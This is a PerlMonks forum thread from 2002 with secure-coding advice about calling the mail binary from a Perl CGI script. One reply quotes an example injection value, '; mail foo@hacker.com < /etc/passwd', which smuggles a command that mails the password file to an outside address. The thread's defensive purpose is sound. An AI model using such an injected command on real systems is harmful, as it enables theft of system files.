Re: Yet another email question


Problems? Is your data what you think it is?
	PerlMonks

by amphiplex (Monk)

on Jul 23, 2002 at 09:42 UTC ( [id://184364]=note: print w/replies, xml )

Need Help??

Hi !

I cant believe that this works, you have not specified any recipients ? Or ary you using some custom mail ?

Aside from this:

You really should be using a module, especially when using this in a CGI-Script
If you absolutely must use the mail binary, make sure to check the variables. If you don't check the user input here, someone could, for example, give you a dirname of "; mail foo@hacker.com < /etc/passwd". So strip out at least: [&;<>"'`|]
use the absolute path to your mail binary, something like /usr/bin/mail

---- amphiplex

Comment on Re: Yet another email question Download Code

Replies are listed 'Best First'.
Re^2: Yet another email question by Aristotle (Chancellor) on Jul 23, 2002 at 13:49 UTC
No no no. Don't strip out blacklisted characters. Instead, strip out any but whitelisted ones. For example, `s/\W+//g`. It is too easy to overlook something otherwise. bikeguy: you probably want to read perlsec. Also, Ovid's excellent CGI course has a good easily digestible discussion of CGI script security. Makeshifts last the longest.	[reply] [d/l]

Domain Nodelet^?

Node Status^?

node history
Node Type: note [id://184364]
help

Chatterbox^?

How do I use this? • Last hour • Other CB clients

Other Users^?

Others surveying the Monastery: (3)

As of 2024-04-19 21:41 GMT

Sections^?

Information^?

Find Nodes^?

Leftovers^?

Voting Booth^?

No recent polls found